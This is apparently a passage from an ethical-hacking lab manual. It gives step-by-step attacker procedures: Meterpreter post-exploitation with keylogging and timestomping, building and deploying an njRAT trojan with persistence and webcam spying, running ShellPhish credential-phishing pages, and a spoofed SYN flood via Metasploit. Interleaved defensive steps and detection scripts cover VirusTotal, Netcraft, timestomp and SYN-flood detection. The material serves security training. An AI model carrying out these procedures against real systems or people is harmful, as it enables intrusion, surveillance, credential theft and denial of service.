19. Once you click on the Backdoor.exe file, the Opening Backdoor.exe pop-up appears;
select Save File.
Make sure that both the Backdoor.exe and secret.txt files are stored in the same directory
(here, Downloads).

20. Double-click the Backdoor.exe file. The Open File - Security Warning window appears;
click Run.

21. Leave the Windows 10 machine running and click Parrot Security to switch to
the Parrot Security machine.
22. The Meterpreter session has successfully been opened, as shown in the screenshot.
23. Type sessions -i 1 and press Enter (here, 1 specifies the ID number of the session).
The Meterpreter shell is launched, as shown in the screenshot.
24. Type sysinfo and press Enter. Issuing this command displays target machine
information such as computer name, OS, and domain.

25. Type ipconfig and press Enter. This displays the victim machine’s IP address, MAC
address, and other information.

26. Type getuid and press Enter to display that the Meterpreter session is running as an
administrator on the host.
27. Type pwd and press Enter to view the current working directory on the victim machine.

28. Type ls and press Enter to list the files in the current working directory.
29. To read the contents of a text file, type cat [filename.txt] (here, secret.txt) and
press Enter.
30. Now, we will change the MACE attributes of the secret.txt file.
To view the MACE attributes of secret.txt, type timestomp secret.txt -v and
press Enter. This displays the created time, accessed time, modified time, and entry modified
time, as shown in the screenshot.
To change the MACE value, type timestomp secret.txt -m "02/11/2018 08:10:03" and
press Enter. This command changes the Modified value of the secret.txt file.
-m: specifies the modified value.

31. You can see the changed Modified value by issuing the command timestomp
secret.txt -v.
32. Similarly, you can change the Accessed (-a), Created (-c), and Entry Modified (-e)
values of a particular file.
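After a timestomp run like the one above, a forensic reviewer wants to know how a stomped file gives itself away. The following added example (not part of the lab manual) applies two heuristics to a constructed temporary directory: a whole-second timestamp with no sub-second fraction, and a modified time that lies far before the inode change time (the POSIX counterpart of the NTFS entry-modified value); the 24-hour gap threshold is an assumption.

```python
"""Flag files whose timestamps look stomped (added example, not from the lab manual).

Two heuristics a forensic reviewer applies after a Meterpreter `timestomp`
run like the one above:
  1. A timestamp with an all-zero sub-second component. Tools that set the
     M/A/C value from a "MM/DD/YYYY HH:MM:SS" string write whole seconds,
     while ordinary writes leave a nanosecond fraction.
  2. A metadata-change time (st_ctime, the POSIX analogue of NTFS "entry
     modified") far later than the modified time: changing M updates E, so a
     freshly written file whose M lies years before E has been edited.
The two sample files are constructed in a temporary directory.
"""
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Heuristic 2: flag when ctime - mtime exceeds this many seconds (assumed value).
ENTRY_GAP_SECONDS = 24 * 3600
NS_PER_SECOND = 1_000_000_000


def timestomp_indicators(path, gap_seconds=ENTRY_GAP_SECONDS):
    """Return the reasons `path` looks timestomped; an empty list means clean."""
    st = os.stat(path)
    reasons = []
    if st.st_mtime_ns % NS_PER_SECOND == 0:
        reasons.append("mtime has zero sub-second component")
    if st.st_atime_ns % NS_PER_SECOND == 0:
        reasons.append("atime has zero sub-second component")
    gap = st.st_ctime - st.st_mtime
    if gap > gap_seconds:
        reasons.append("entry-modified time is %.0f s after mtime" % gap)
    return reasons


def scan_directory(root, gap_seconds=ENTRY_GAP_SECONDS):
    """Map every flagged regular file under `root` to its list of indicators."""
    flagged = {}
    for p in Path(root).rglob("*"):
        if p.is_file():
            reasons = timestomp_indicators(p, gap_seconds)
            if reasons:
                flagged[str(p)] = reasons
    return flagged


def build_sample_dir():
    """Create a temp dir holding a normal file and one stomped to the lab's value."""
    root = tempfile.mkdtemp(prefix="mace_demo_")
    normal = Path(root) / "notes.txt"
    normal.write_text("unchanged file\n")
    stomped = Path(root) / "secret.txt"
    stomped.write_text("stomped file\n")
    # Mirror `timestomp secret.txt -m "02/11/2018 08:10:03"`: a whole-second
    # modified time, while the inode change time (st_ctime) becomes "now".
    stamp = datetime(2018, 2, 11, 8, 10, 3, tzinfo=timezone.utc).timestamp()
    os.utime(stomped, ns=(os.stat(stomped).st_atime_ns, int(stamp) * NS_PER_SECOND))
    return root


if __name__ == "__main__":
    demo_root = build_sample_dir()
    for name, why in scan_directory(demo_root).items():
        print(name, "->", "; ".join(why))
```

On NTFS the same comparison is made between the $STANDARD_INFORMATION and $FILE_NAME attributes, which timestomp's -m/-a/-c/-e options do not touch in the same way.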
33. The cd command changes the present working directory. As you know, the current
working directory is C:\Users\Admin\Downloads. Type cd C:/ and press Enter to change
the current remote directory to C.
34. Now, type pwd and press Enter and observe that the current remote directory has
changed to the C drive.

35. Here, the download command downloads a file from the remote machine to the host
machine. To do so, type download [Filename.extension] and press Enter.
36. The file will be downloaded to the Home or root folder of the host machine (here,
the Parrot Security machine).
37. You can also use a search command that helps you to locate files on the target machine.
This type of command is capable of searching through the whole system or can be limited
to specific folders.
38. Type search -f [Filename.extension] (here, pagefile.sys) and press Enter. This displays
the location of the searched file.
39. Now that you have successfully exploited the system, you can perform post-exploitation
maneuvers such as key-logging. Type keyscan_start and press Enter to start capturing all
keyboard input from the target system.

40. Now, click Windows 10 to switch to the Windows 10 machine, create a text file, and
start typing something.
41. Click Parrot Security to switch to the Parrot Security machine, type keyscan_dump, and
press Enter. This dumps all captured keystrokes.

42. Type idletime and press Enter to display the amount of time for which the user has
been idle on the remote system.

43. You can also type shutdown and press Enter to shut down the victim machine after
performing post-exploitation.
44. Observe that the Meterpreter session also dies as soon as you shut down the victim
machine.

45. Click Windows 10 to switch to the Windows 10 machine (victim machine).
46. You can observe that the machine has been turned off.
47. This concludes the demonstration of how to hack Windows machines using Metasploit
and perform post-exploitation using Meterpreter.

Experiment – 6
6.1) Gain Control over a Victim Machine using the njRAT RAT Trojan

1. Navigate to D:\CEH-Tools\CEHv11 Module 07 Malware Threats\Trojans Types\Remote Access Trojans (RAT)\njRAT and double-click njRAT v0.7d.exe.
2. The njRAT GUI appears along with an njRAT pop-up, where you need to specify the
port you want to use to interact with the victim machine. Enter the port number and
click Start.
3. In this lab, the default port number 5552 has been chosen.

4. The njRAT GUI appears; click the Builder link located in the lower-left corner of the GUI
to configure the exploit details.

5. The Builder dialog box appears; enter the IP address of the Windows 10 (attacker)
machine in the Host field, check the Registry StartUp option, leave the other
settings at their defaults, and click Build.
6. The Save As window appears; specify a location to store the server, rename it, and
click Save.
7. In this lab, the destination location chosen is Desktop, and the file is named Test.exe.

8. Once the server is created, the DONE! pop-up appears; click OK.
9. Now, use any technique to send this server to the intended target through email or any
other channel (in a real attack, this is how the attacker delivers the server to the victim).
10. Click Windows Server 2016 to switch to the Windows Server 2016 machine.
Click Ctrl+Alt+Delete to activate the machine. By default, the CEH\Administrator account is
selected; click Pa$$w0rd to enter the password and press Enter.
11. Navigate to the shared network location (CEH-Tools), and then Copy and Paste the
executable file (Test.exe) onto the Desktop of Windows Server 2016.
12. Here, you are acting both as an attacker who logs into the Windows 10 machine to
create a malicious server, and as a victim who logs into the Windows Server 2016 machine
and downloads the server.
13. Double-click the server (Test.exe) to run this malicious executable.
14. Click Windows 10 to switch back to the Windows 10 machine. As soon as the victim
(here, you) double-clicks the server, the executable starts running and the njRAT client
(njRAT GUI) running in Windows 10 establishes a persistent connection with the victim
machine, as shown in the screenshot.

15. Unless the attacker working on the Windows 10 machine disconnects the server on
their own, the victim machine remains under their control.
16. The GUI displays the machine’s basic details such as the IP address, User name, and Type
of Operating system.
17. Right-click on the detected victim name and click Manager.
18. The manager window appears with File Manager selected by default.
19. Double-click any directory in the left pane (here, ProgramData); all its associated files
and directories are displayed in the right pane. You can right-click a selected directory and
manipulate it using the contextual options.
20. Click on Process Manager. You will be redirected to the Process Manager, where you
can right-click on a selected process and perform actions such as Kill, Delete, and Restart.

21. Click on Connections, select a specific connection, right-click on it, and click Kill
Connection. This kills the connection between two machines communicating through a
particular port.
22. Click on Registry, choose a registry directory from the left pane, and right-click on its
associated registry files.
23. A few options appear for the files; you can use these to manipulate them.
24. Click Remote Shell. This launches a remote command prompt for the victim machine
(Windows Server 2016).
25. Type the command ipconfig/all and press Enter.
26. This displays all interfaces related to the victim machine, as shown in the screenshot.

27. Similarly, you can issue all other commands that can be executed in the command
prompt of the victim machine.
28. In the same way, click Services. You will be able to view all services running on the
victim machine. In this section, you can use options to start, pause, or stop a service.
29. Close the Manager window.
30. Now, right-click on the victim name, click Run File, and choose an option from the
drop-down list to execute scripts or files remotely from the attacker machine
31. Right-click on the victim name, and then select Remote Desktop.

32. This launches a remote desktop connection without the victim’s awareness.

33. A Remote Desktop window appears; hover the mouse cursor to the top-center area of
the window. A down arrow appears; click it.
34. A remote desktop control panel appears; check the Mouse option.
35. Now, you will be able to remotely interact with the victim machine using the mouse.
If you want to create any files or write any scripts on the victim machine, you need to check
the Keyboard option.

36. On completing the task, close the Remote Desktop window.


37. In the same way, right-click on the victim name, and select Remote
Cam and Microphone to spy on them and track voice conversations.

38. Click Windows Server 2016 to switch to the Windows Server 2016 machine. Assume
that you are a legitimate user and perform a few activities such as logging into any website
or typing some text in text documents.
39. Click Windows 10 to switch back to the Windows 10 machine, right-click on the victim
name, and click Keylogger.
40. The Keylogger window appears; wait for the window to load.
41. The window displays all the keystrokes performed by the victim on the Windows Server
2016 machine, as shown in the screenshot.

42. Close the Keylogger window.


43. Right-click on the victim name, and click Open Chat.
44. A Chat pop-up appears; enter a nickname (here, Hacker) and click OK.

45. A chat box appears; type a message, and then click Send.
46. In real-time, as soon as the attacker sends the message, a pop-up appears on the
victim’s screen (Windows Server 2016), as demonstrated in the screenshot.
47. Click Windows Server 2016 to switch to the Windows Server 2016 machine, you can
observe the message from the hacker appears on the screen.

48. Seeing this, the victim becomes alert and attempts to close the chatbox. Irrespective of
what the victim does, the chatbox remains open as long as the attacker uses it.
49. Surprised by the behavior, the victim (you) attempts to break the connection by
restarting the machine. As soon as this happens, njRAT loses its connection with Windows
Server 2016, as the machine is shut down in the process of restarting.
50. Click Windows 10 to switch back to the attacker machine (Windows 10); you can see
that the connection with the victim machine is lost.

51. However, as soon as the victim logs in to their machine, the njRAT client automatically
establishes a connection with the victim, as shown in the screenshot.
52. Click Windows Server 2016 to switch to the victim machine (Windows Server 2016).
Click Ctrl+Alt+Delete to activate the machine, by default, CEH\Administrator account is
selected, click Pa$$w0rd to enter the password and press Enter.
53. Click Windows 10 to switch back to the attacker machine (Windows 10); you can see
that the connection has been re-established with the victim machine.

54. The attacker, as usual, makes use of the connection to access the victim machine
remotely and perform malicious activity.
55. On completion of this lab, click Windows Server 2016 to switch to the Windows Server
2016 machine, launch Task Manager, look for the server.exe (32 bit) process, and
click End task.
56. This concludes the demonstration of how to create a Trojan using njRAT to gain
control over a victim machine.

6.2) Perform Online Malware Scanning using VirusTotal:


1. Open any web browser (here, Google Chrome). In the address bar, enter
https://www.virustotal.com and press Enter.
2. The VirusTotal main analysis site appears; click Choose file to upload a virus file.

3. The Open window appears; navigate to D:\CEH-Tools\CEHv11 Module 07 Malware Threats\Viruses, select tini.exe, and click Open.
4. The selected file will be sent to the VirusTotal server for analysis.
5. VirusTotal returns a detailed report displaying the result of each anti-virus for the
selected tini.exe malicious file under the DETECTION tab, as shown in the screenshot.

6. Now, click the DETAILS tab to view the malicious file details such as Basic Properties,
History, Names, Portable Executable Info, Sections, Imports, and ExifTool File Metadata.
7. Click the RELATIONS tab to view Execution Parents, PE Resource Parents, Contained in
Graphs, and Graph Summary. Scroll down to view other details.
8. To view Graph Summary, you will need a VirusTotal account.
9. Click the BEHAVIOR tab to view the File System Actions, Process and Service Actions,
Shell Commands, and Synchronization Mechanisms & Signals.
10. Close the web browser once the analysis is complete.

You can also use other local and online malware scanning tools such as Hybrid
Analysis (https://www.hybrid-analysis.com), Cuckoo Sandbox (https://cuckoosandbox.org),
Jotti (https://virusscan.jotti.org), or Valkyrie Sandbox (https://valkyrie.comodo.com)
to perform online malware scanning.

EXPERIMENT 7
A
Lab 1: Gain Access to the Target System using Trojans
Lab Scenario

Trojan horses deceive users into triggering malicious actions on their computers, granting
attackers unrestricted access to sensitive data. These attacks often occur through seemingly
harmless downloads or clicks, enabling the Trojan to operate with the same privileges as the
victim. This can lead to data loss, unauthorized access, and further exploitation of system
vulnerabilities. Security measures, including proper antivirus configuration and network
assessments by experts, are crucial to prevent Trojan attacks. Lab exercises illustrate the ease with
which hackers can compromise systems and establish covert communication channels for data
transfer.

Lab Objectives

• Gain control over a victim machine using the njRAT RAT Trojan

Task 1: Gain Control over a Victim Machine using the njRAT RAT
Trojan

Attackers use Remote Access Trojans (RATs) like njRAT to gain control of target machines
surreptitiously. RATs enable remote access to the victim's computer, allowing the attacker to
perform various malicious actions, including keylogging, file access, and webcam spying. njRAT,
in particular, is adept at stealing data, accessing cameras, stealing browser credentials, and
controlling Botnets. It can be manipulated to spread through USB drives, providing attackers with
extensive control over infected systems.

Using njRAT, we'll take control of a Windows Server 2016 machine (10.10.10.16) from a Windows
10 attacker machine (10.10.10.10) in this lab. Note that client versions and website appearances
may vary, but the server and client creation process remains the same.

1. By default, the Windows 10 machine is selected; click Ctrl+Alt+Delete.

2. By default, the Admin user profile is selected; click Pa$$w0rd to paste the password into the
Password field and press Enter to log in.
3. Navigate to D:\CEH-Tools\CEHv11 Module 07 Malware Threats\Trojans
Types\Remote Access Trojans (RAT)\njRAT and double-click njRAT v0.7d.exe.
4. The njRAT GUI appears along with an njRAT pop-up, where you need to specify the port
you want to use to interact with the victim machine. Enter the port number and click Start.
5. Access the njRAT GUI, click on the Builder link, input the Windows 10 (attacker machine) IP
address in the Host field, select Registry Startup, keep other settings default, and click Build.

6. In the Save As window, specify a storage location for the server, rename it, and click Save
(e.g., in this lab, the Desktop is chosen, and the file is named Test.exe). Once created, click
OK on the DONE! pop-up to finish. Now, the server can be sent to the target through email
or any other means as per the attacker's method.
7. Click Windows Server 2016 to switch to the Windows Server 2016 machine.
8. Navigate to the shared network location (CEH-Tools), and then Copy and Paste the
executable file (Test.exe) onto the Desktop of Windows Server 2016.
9. Unless the attacker working on the Windows 10 machine disconnects the server on
their own, the victim machine remains under their control.
10. The GUI displays the machine’s basic details such as the IP address, User name, and Type
of Operating system.
11. Right-click on the detected victim name and click Manager.
12. Double-click any directory in the left pane (here, ProgramData); all its associated files
and directories are displayed in the right pane. You can right-click a selected directory and
manipulate it using the contextual options.

13. Click on Process Manager. You will be redirected to the Process Manager, where you
can right-click on a selected process and perform actions such as Kill, Delete, and Restart.

14. Click on Connections, select a specific connection, right-click on it, and click Kill
Connection. This kills the connection between two machines communicating through a
particular port.

15. Click on Registry, choose a registry directory from the left pane, and right-click on its
associated registry files.
16. A few options appear for the files; you can use these to manipulate them.
17. Click Remote Shell. This launches a remote command prompt for the victim machine
(Windows Server 2016).
18. Type the command ipconfig/all and press Enter.
19. This displays all interfaces related to the victim machine, as shown in the screenshot.
20. Similarly, you can issue all other commands that can be executed in the command
prompt of the victim machine.

21. Now, right-click on the victim name, click Run File, and choose an option from the drop-
down list to execute scripts or files remotely from the attacker machine.
22. Right-click on the victim name, and then select Remote Desktop.
23. This launches a remote desktop connection without the victim’s awareness.
24. A Remote Desktop window appears; hover the mouse cursor to the top-center area of
the window. A down arrow appears; click it.
25. A remote desktop control panel appears; check the Mouse option.

26. Remotely interact with the victim's machine using the mouse. For file creation or script
writing, check the Keyboard option. After completing the task, close the Remote Desktop
window. Additionally, right-click on the victim's name, choose Remote Cam and
Microphone to spy on them and monitor voice conversations.

27. Switch to Windows 10, right-click on the victim's name, and select Keylogger. Once the
Keylogger window appears, it displays all the keystrokes made by the victim on the

Windows Server 2016 machine.

28. After the attacker sends a message, a pop-up appears on the victim's screen (Windows
Server 2016).
29. Despite the victim's attempts to close the chatbox, it remains open as long as the attacker
is connected; only restarting the machine breaks the njRAT connection, because the machine shuts
down during the restart.
30. Upon the victim's login, njRAT automatically re-establishes the connection, allowing the
attacker to resume remote access and perform malicious activities.

Perform Static Malware Analysis


Lab Objectives

• Perform online malware scanning using VirusTotal
• Perform a strings search using BinText
• Identify packing and obfuscation methods using PEid

Overview of Static Malware Analysis

Static Malware Analysis, or code analysis, involves scrutinizing executable binary code without
execution to understand the malware's purpose. It utilizes tools and techniques like file
fingerprinting, malware scanning, string searches, identifying packing and obfuscation methods,
finding portable executable information, recognizing file dependencies, and malware
disassembly. This process gathers information such as file name, MD5 checksums, file type, size,
and reveals details about functionality, network signatures, exploit packaging, and dependencies.

Task 1: Perform Online Malware Scanning using VirusTotal

VirusTotal, a free service, swiftly detects viruses, worms, Trojans, and malware by analyzing
suspicious files and URLs. It acts as an information aggregator, gathering data from various
antivirus engines, website scanners, and user contributions. The malware signatures are regularly
updated every 15 minutes, ensuring the latest sets are utilized. VirusTotal aids ethical hackers
and penetration testers in identifying malicious content by analyzing files and URLs through its
comprehensive data aggregation.

1. By default, the Admin user profile is selected; click Pa$$w0rd to paste the password into the
Password field and press Enter to log in.
2. Open any web browser (here, Google Chrome). In the address bar, enter
https://www.virustotal.com and press Enter.
3. The VirusTotal main analysis site appears; click Choose file to upload a virus file.

4. The Open window appears; navigate to D:\CEH-Tools\CEHv11 Module 07 Malware Threats\Viruses, select tini.exe, and click Open.

5. The selected file will be sent to the VirusTotal server for analysis.
6. VirusTotal returns a detailed report displaying the result of each anti-virus for the
selected tini.exe malicious file under the DETECTION tab, as shown in the screenshot.

7. Now, click the DETAILS tab to view the malicious file details such as Basic Properties,
History, Names, Portable Executable Info, Sections, Imports, and ExifTool File Metadata.

8. Click the RELATIONS tab to view Execution Parents, PE Resource Parents, Contained in
Graphs, and Graph Summary. Scroll down to view other details.

9. Click the BEHAVIOR tab to view the File System Actions, Process and Service Actions,
Shell Commands, and Synchronization Mechanisms & Signals.

10. Close the web browser once the analysis is complete.
11. You can also use other local and online malware scanning tools such as Hybrid
Analysis (https://www.hybrid-analysis.com), Cuckoo Sandbox (https://cuckoosandbox.org),
Jotti (https://virusscan.jotti.org), or Valkyrie Sandbox (https://valkyrie.comodo.com)
to perform online malware scanning.
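Both the 6.2 steps and this task upload the sample through the web form, which hands the file to VirusTotal and its partners. A defender triaging a possibly sensitive file normally hashes it locally, looks the hash up first, and uploads only if it is unknown. The following added example (not part of the manual or VirusTotal's own code) does that hash-first lookup against the real v3 endpoint GET https://www.virustotal.com/api/v3/files/{sha256} with an x-apikey header, and reduces a report to the detection ratio and verdict names; the JSON report it parses is a constructed, shortened sample in the v3 format, with illustrative engine names and verdict strings.

```python
"""Hash-first VirusTotal lookup and report summary (added example, not from the manual)."""
import hashlib
import json
import urllib.error
import urllib.request

VT_FILES_URL = "https://www.virustotal.com/api/v3/files/"

# Engine categories that mean "this engine actually scanned the file".
SCANNED_CATEGORIES = ("malicious", "suspicious", "undetected", "harmless")


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file so a large sample does not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def lookup_hash(api_key, sha256, timeout=30):
    """Fetch the v3 file report by hash; return None when VirusTotal has never seen it (404)."""
    req = urllib.request.Request(VT_FILES_URL + sha256, headers={"x-apikey": api_key})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as exc:
        if exc.code == 404:
            return None
        raise


def summarize_report(report, min_engines=3):
    """Reduce a v3 file report to what an analyst reads first.

    Returns the detection ratio over engines that scanned the file, the
    malicious verdict names grouped by the engines that agree on them, and a
    verdict that requires at least `min_engines` malicious hits (assumed
    threshold) before calling the sample malicious.
    """
    attrs = report["data"]["attributes"]
    stats = attrs["last_analysis_stats"]
    results = attrs["last_analysis_results"]
    scanned = sum(stats.get(k, 0) for k in SCANNED_CATEGORIES)
    malicious = stats.get("malicious", 0)
    names = {}
    for engine, r in results.items():
        if r.get("category") == "malicious" and r.get("result"):
            names.setdefault(r["result"], []).append(engine)
    return {
        "sha256": attrs.get("sha256"),
        "ratio": "%d/%d" % (malicious, scanned),
        "names": {k: sorted(v) for k, v in names.items()},
        "verdict": "malicious" if malicious >= min_engines else "undetermined",
    }


# Constructed sample in the shape of a v3 files report; engine names and
# verdict strings are illustrative placeholders, not real VirusTotal results.
SAMPLE_REPORT = json.loads("""
{"data": {"type": "file", "id": "PLACEHOLDER-SHA256",
  "attributes": {
    "sha256": "PLACEHOLDER-SHA256",
    "last_analysis_stats": {"malicious": 4, "undetected": 2, "harmless": 0,
                            "suspicious": 0, "timeout": 0, "type-unsupported": 1},
    "last_analysis_results": {
      "EngineA": {"category": "malicious", "result": "Backdoor.SampleA"},
      "EngineB": {"category": "malicious", "result": "Backdoor.SampleA"},
      "EngineC": {"category": "malicious", "result": "Trojan.SampleB"},
      "EngineD": {"category": "malicious", "result": "Backdoor.SampleA"},
      "EngineE": {"category": "undetected", "result": null},
      "EngineF": {"category": "undetected", "result": null},
      "EngineG": {"category": "type-unsupported", "result": null}}}}}
""")

if __name__ == "__main__":
    # Real use: summary = summarize_report(lookup_hash(API_KEY, sha256_of_file(path)))
    print(json.dumps(summarize_report(SAMPLE_REPORT), indent=2))
```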

EXPERIMENT 8
1.2 Perform Phishing using ShellPhish
Steps:

1. Open Firefox in Kali Linux


2. Go to GitHub and search for shellphish
3. Select the first repository
4. Click on the Clone or Download button and copy the URL
5. Open your Terminal
6. Type git clone URL and paste the URL you have copied, then press Enter.
7. It will start downloading the shellphish file.

8. When the download is complete, change your directory to shellphish by typing cd shellphish.

9. In the Shellphish directory, typing command ls -l will show all files and their permissions.

10. Now, what we need to change is the permissions of shellphish.sh


11. As you can see, its permissions are -rw-r--r--: r means read permission and w means write
permission.
12. There is no execute permission, i.e., x. To add execute permission, run chmod +x shellphish.sh,
which gives the file the new permission (x).

13. Now, we can execute it by typing ./shellphish.sh


14. Shellphish has started. Choose any option from above just by typing the number; e.g., if I want to make
an Instagram phishing page, I will type (1) as insta is written on number one.

15. Then, choose a port forwarding service that will give you the phishing URL. I will go with ngrok, so I
typed 2.

16. If I use it for the first time, it will start downloading ngrok. Please wait for it.
17. When the download is complete, it will present a URL, which is the URL we will use to phish our
target.

18. Next, this link can be sent via email, WhatsApp, Messenger, or any other media.
19. When the target clicks on this link, you will get their location and IP address.
20. After that, the page will open. When the target types his/her username and password, it will be sent to
the attacker. Then the target will be redirected to their Instagram.

21. If the target is using Tor, the location is unknown; otherwise, the location shown will be the
target's actual location. Notice: This article is for ethical hacking and educational purposes only.

2.1 Detect Phishing using Netcraft

1. Visit the Netcraft Website: Go to the official Netcraft website at https://www.netcraft.com/.

2. Access the Phishing Site Feed: Netcraft provides a Phishing Site Feed that you can use to check if a
website is listed as a known phishing site. Navigate to the "Phishing Site Feed" section on the Netcraft
website.

3. Subscribe to the Phishing Site Feed: To access the most up-to-date information, consider subscribing
to the Netcraft Phishing Site Feed. This feed provides real-time data on phishing websites that Netcraft
has identified.

4. Use Netcraft Browser Extensions: Netcraft offers browser extensions for popular browsers like
Chrome and Firefox. These extensions can provide real-time protection by blocking access to known
phishing sites. Install the Netcraft extension for your preferred browser.

5. Check Site Information: Netcraft provides a service where you can enter the URL of a website to
check if it is listed in their phishing database. Visit the "Check site" section on the Netcraft website,
enter the URL, and review the results.

6. Analyze Netcraft's Site Reports: Netcraft generates detailed reports for websites, including
information about the site's history, hosting details, and whether it has been involved in any phishing
activities. Use these reports to make informed decisions about the legitimacy of a website.

7. Stay Informed: Phishing sites are dynamic, and new ones emerge regularly. Stay informed about the
latest phishing threats by regularly checking Netcraft's resources, subscribing to updates, and following
any alerts or warnings provided by the service.

8. Report Suspected Phishing Sites: If you come across a website that you suspect is a phishing site and
it is not listed in Netcraft's database, report it to Netcraft. They actively encourage user participation in
identifying and reporting phishing sites to enhance their database.

EXPERIMENT 9
Task 1: Perform a DoS Attack (SYN Flooding) on a Target
Host using Metasploit
SYN flooding takes advantage of the way most hosts implement the TCP three-way handshake.
The attack occurs when the intruder sends SYN packets (connection requests) to the host faster
than the host can process them. Normally, a connection is established with the TCP three-way
handshake, and the host keeps track of each partially open connection in a listening queue while
waiting for the client's ACK packet; SYN requests that are never completed fill up that queue.

Metasploit is a penetration testing platform that allows a user to find, exploit, and validate
vulnerabilities. Also, it provides the infrastructure, content, and tools to conduct penetration tests
and comprehensive security auditing. The Metasploit framework has numerous auxiliary module
scripts that can be used to perform DoS attacks.

Here, we will use the Metasploit tool to perform a DoS attack (SYN flooding) on a target host.

In this task, we will use the Parrot Security (10.10.10.13) machine to perform SYN flooding on
the Windows 10 (10.10.10.10) machine through port 21.

1. On the login page, the attacker username is selected by default. Enter toor in the
Password field and press Enter to log in to the machine.
2. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.
o If a Question pop-up window appears asking for you to update the machine,
click No to close the window.

3. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.
4. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

5. Now, type cd and press Enter to jump to the root directory.

6. First, determine whether port 21 is open or not. This involves using Nmap to determine
the state of the port.
7. On the Parrot Terminal window, type nmap -p 21 (Target IP address) (here, target IP
address is 10.10.10.10 [Windows 10]) and press Enter.

-p: specifies the port to be scanned.

8. The result appears, displaying the port status as open, as shown in the screenshot.

If the port in your lab environment turns out to be closed, look for an open port using
Nmap.

9. Now, we will perform SYN flooding on the target machine (Windows 10) using port 21.
10. In this task, we will use an auxiliary module of Metasploit called synflood to perform a
DoS attack on the target machine.
11. Type msfconsole from a command-line terminal and press Enter to launch msfconsole.

12. In the msf command line, type use auxiliary/dos/tcp/synflood and press Enter to
launch a SYN flood module.

13. Now, determine which module options need to be configured to begin the DoS attack.
14. Type show options and press Enter. This displays all the options associated with the
auxiliary module.

15. Here, we will perform SYN flooding on port 21 of the Windows 10 machine by spoofing
the IP address of the Parrot Security machine with that of the Windows Server 2019
(10.10.10.19) machine.
16. Issue the following commands:
o set RHOST (Target IP Address) (here, 10.10.10.10)
o set RPORT 21
o set SHOST (Spoofable IP Address) (here, 10.10.10.19)
By setting the SHOST option to the IP address of the Windows Server 2019 machine, you are
spoofing the IP address of the Parrot Security machine with that of Windows Server 2019.

17. Once the auxiliary module is configured with the required options, start the DoS attack
on the Windows 10 machine.
18. To do so, type exploit and press Enter. This begins SYN flooding the Windows
10 machine.

19. To confirm, click Windows 10 to switch to the Windows 10 machine and click Ctrl+Alt+Delete.
By default, the Admin user profile is selected; click Pa$$w0rd to paste the password into the
Password field and press Enter to log in.

Alternatively, you can click Pa$$w0rd under the Windows 10 machine thumbnail in
the Resources pane, or click the Type Text | Type Password button under the Commands
(thunder icon) menu.
If the Welcome to Windows wizard appears, click Continue, and in the Sign in with
Microsoft wizard, click Cancel.
If the Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and
devices on the network.

20. Double-click Wireshark shortcut present on the Desktop.


21. The Wireshark Network Analyzer window appears. Double-click on the primary
network interface (here, Ethernet 2) to start capturing the network traffic.

The network interface might differ in your lab environment.

22. Wireshark displays the traffic coming from the machine. Here, you can observe that
the Source IP address is that of the Windows Server 2019 (10.10.10.19) machine. This
implies that the IP address of the Parrot Security machine has been spoofed.

23. Observe that the target machine (Windows 10) has drastically slowed, implying that the
DoS attack is in progress on the machine. If the attack is continued for some time, the
machine’s resources will eventually be completely exhausted, causing it to stop responding.
24. Once the performance analysis of the machine is complete, click on Parrot Security to
switch to the Parrot Security machine and press Ctrl+C to terminate the attack.

25. This concludes the demonstration of how to perform SYN flooding on a target host
using Metasploit.

Close all open windows and document all the acquired information.
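The Wireshark view in steps 22 and 23 is what a defender automates: many SYNs arriving from one source that never completes the handshake. The following added example (not part of the lab manual) runs that check over a constructed capture shaped like this task, a burst of SYNs to 10.10.10.10:21 with the spoofed source 10.10.10.19 beside one legitimate FTP handshake from a made-up client 10.10.10.5; the record layout, the 10-second window and the alert threshold of 50 are assumptions.

```python
"""Half-open SYN counting over capture records (added example, not from the lab manual).

Each record is (time_seconds, src, dst, dport, flags), the fields a pcap or
flow export exposes; flags use tcpdump-style letters ("S" for SYN, "A" for
ACK, "SA" for SYN-ACK). A SYN that is followed by an ACK from the same source
within the window is a completed handshake; one that is not is half-open.
"""
from collections import defaultdict

SYN, ACK = "S", "A"


def half_open_per_source(packets, window_seconds=10.0):
    """Map (src, dst, dport) to the number of SYNs never answered by an ACK from src."""
    pending = defaultdict(list)   # (src, dst, dport) -> unanswered SYN timestamps
    half_open = defaultdict(int)
    for t, src, dst, dport, flags in sorted(packets, key=lambda p: p[0]):
        # Expire first: a SYN older than the window with no ACK counts as half-open.
        for k, ts in pending.items():
            while ts and t - ts[0] > window_seconds:
                ts.pop(0)
                half_open[k] += 1
        key = (src, dst, dport)
        if flags == SYN:
            pending[key].append(t)
        elif ACK in flags and pending[key]:
            pending[key].pop(0)   # oldest outstanding SYN from this source completed
    for k, ts in pending.items():
        half_open[k] += len(ts)   # still unanswered when the capture ended
    return dict(half_open)


def syn_flood_alerts(packets, threshold=50, window_seconds=10.0):
    """Return [(src, dst, dport, count)] for sources at or above `threshold` half-open SYNs."""
    counts = half_open_per_source(packets, window_seconds)
    hits = [(s, d, p, n) for (s, d, p), n in counts.items() if n >= threshold]
    return sorted(hits, key=lambda x: -x[3])


def build_sample_capture(flood_syns=200):
    """Constructed capture: one legitimate FTP handshake plus a spoofed-source flood."""
    pkts = [
        (0.000, "10.10.10.5", "10.10.10.10", 21, "S"),
        (0.000, "10.10.10.10", "10.10.10.5", 21, "SA"),   # server SYN-ACK, not a new SYN
        (0.001, "10.10.10.5", "10.10.10.10", 21, "A"),    # client ACK completes handshake
    ]
    for i in range(flood_syns):
        # The synflood module stamps the spoofed SHOST (10.10.10.19) as source; the
        # victim's SYN-ACKs go to that host, so no ACK ever comes back.
        pkts.append((1.0 + i * 0.001, "10.10.10.19", "10.10.10.10", 21, "S"))
    return pkts


if __name__ == "__main__":
    for src, dst, dport, n in syn_flood_alerts(build_sample_capture()):
        print("SYN flood: %s -> %s:%d, %d half-open connections" % (src, dst, dport, n))
```

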